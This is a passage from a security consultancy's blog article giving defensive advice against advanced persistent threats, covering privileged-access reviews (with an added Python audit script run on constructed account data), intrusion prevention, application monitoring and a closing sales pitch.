  • Build a review process into the PAM policy so that privileges are audited regularly and integrity is maintained over time (for example, stale and departed-user accounts are removed, and anyone who no longer needs rights is dropped from privileged groups).
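What the review step looks like once it is automated, as an added example that is not code from the article: the script runs a constructed directory export through the checks a PAM policy of the kind described above would specify. The snapshot, the field names, the ‘adm-’ naming convention for separate admin accounts and the 90-day staleness limit are all assumptions for the example.

```python
"""A periodic privileged-account review, run against a directory export.

Added example, not code from the article. The PAM tips above call for a written
policy and a regular audit of who holds administrative rights; this is what that
audit looks like when automated. It checks every member of a privileged group
against the policy: on the approved list, security training completed, account
enabled and recently used, and a dedicated admin account rather than the
account used for email and browsing. The snapshot below is constructed, and the
field names, the 'adm-' naming convention and the 90-day limit are assumptions.
"""
from __future__ import annotations
from datetime import date, timedelta

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Server Operators"}
APPROVED_ADMINS = {"adm-alice", "adm-bob"}      # maintained by the PAM policy owner
STALE_AFTER = timedelta(days=90)
ADMIN_PREFIX = "adm-"                           # assumed naming convention for admin accounts

# Constructed export (what you would pull from Active Directory or your identity provider).
SNAPSHOT = [
    {"sam": "adm-alice", "groups": ["Domain Admins"], "enabled": True, "last_logon": date(2021, 5, 20), "training": True},
    {"sam": "adm-bob", "groups": ["Server Operators"], "enabled": True, "last_logon": date(2021, 1, 2), "training": True},
    {"sam": "adm-carol", "groups": ["Domain Admins"], "enabled": True, "last_logon": date(2021, 5, 1), "training": False},
    {"sam": "dave", "groups": ["Domain Admins", "Sales"], "enabled": True, "last_logon": date(2021, 5, 21), "training": True},
    {"sam": "adm-erin", "groups": ["Enterprise Admins"], "enabled": False, "last_logon": date(2020, 11, 3), "training": True},
    {"sam": "frank", "groups": ["Sales"], "enabled": True, "last_logon": date(2021, 5, 21), "training": False},
]


def review(snapshot: list[dict], today: date) -> dict[str, list[str]]:
    """Return {account: [policy violations]} for every privileged account that fails a check."""
    findings: dict[str, list[str]] = {}
    for acct in snapshot:
        held = PRIVILEGED_GROUPS.intersection(acct["groups"])
        if not held:
            continue  # ordinary users are out of scope for the privileged review
        issues = []
        if acct["sam"] not in APPROVED_ADMINS:
            issues.append("not on the approved admin list")
        if not acct["training"]:
            issues.append("required security training not completed")
        if not acct["enabled"]:
            issues.append("disabled account still a member of " + ", ".join(sorted(held)))
        elif today - acct["last_logon"] > STALE_AFTER:
            issues.append("no logon for %d days" % (today - acct["last_logon"]).days)
        if not acct["sam"].startswith(ADMIN_PREFIX):
            issues.append("daily-use account holds admin rights; move them to a separate admin account")
        if issues:
            findings[acct["sam"]] = issues
    return findings


if __name__ == "__main__":
    for account, issues in review(SNAPSHOT, date(2021, 5, 24)).items():
        print(account)
        for issue in issues:
            print("  -", issue)
```

Run on a schedule, the output becomes the agenda for the review meeting the policy requires, and the approved-admin list becomes the single place where a grant has to be written down before it takes effect.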

You will find that the principles of Zero Trust are vital here. To learn more about Zero Trust, watch our on-demand webinar on cloud security, or read our article “4 critical steps to implementing best practice cloud architecture”.

5. Network intrusion prevention systems

Intrusion prevention systems are the other side of the coin to anti-virus software. They monitor network communications across the enterprise for suspicious activity and intervene where necessary. An IPS will:

  • Sit inline behind the firewall so that network traffic passes through it.
  • Look for suspicious activity within network packets and act on it, sending alerts to admins or blocking the communication outright.
  • Run in tandem with anti-virus, which looks specifically for dangerous executables online or on the host. One blocks software, the other blocks traffic.

Tips for implementing a network IPS: 

  • Ensure all IPS events are timestamped, ideally against a synchronized clock, so that you can correlate them with other activity at the same time, reduce false-positive assumptions and save effort later.
  • Use web filtering to maintain blocklists and allowlists of websites (again, saving time later).
  • Implement an IPS with TLS inspection capabilities, so that encrypted transmissions can be intercepted, decrypted, checked for malicious content and re-encrypted before being sent on to the right destination. Bear in mind that the inspection point then holds the keys and sees everything, so it must be secured and scoped carefully, and it may take some research to find a platform that does this at scale without a serious slowdown.
  • Also implement DDoS protection. Distributed denial of service (DDoS) attacks remain common and effective, and some IPS products cannot handle the load. You need a protection layer that can detect these attacks and absorb or stop them before they cause harm.

6. Improved application monitoring 

Actively monitoring your applications helps your operations team spot potential threats as they occur, or very close to it. This is especially important for applications that are attractive to APTs: those that expose an entry point to the system (e.g. they are internet facing), that generate revenue, or that fall under a compliance regime (e.g. GDPR, SOX).

Tips for implementing better application monitoring: 

It is critical to evolve your app teams from DevOps to DevSecOps, integrating experienced security personnel into the entire CI/CD pipeline, from ideation through to monitoring and feedback.

Including security experts at each stage of development lets them check for problems as you go, reducing the risk that an app goes live with major undetected vulnerabilities.

Learn more: “What is DevSecOps, and how is it different to DevOps?”

Worried about cyber espionage groups? Don’t go it alone 

APTs are a very real threat no matter where your enterprise operates in the world. Even if your organization does not fit the “who is at risk” profiles we’ve outlined in this article, the simple fact that you’re connected to the digital supply chain puts you at risk.

That’s where we come in.

At dig8ital, we have extensive experience building better security architecture for even the largest organizations, having worked with some of Germany’s most prominent and complex businesses across sectors.

You don’t have to face the cyber threat alone. Contact us today for a free maturity consultation and let’s talk about what we can do for your unique business.

Share :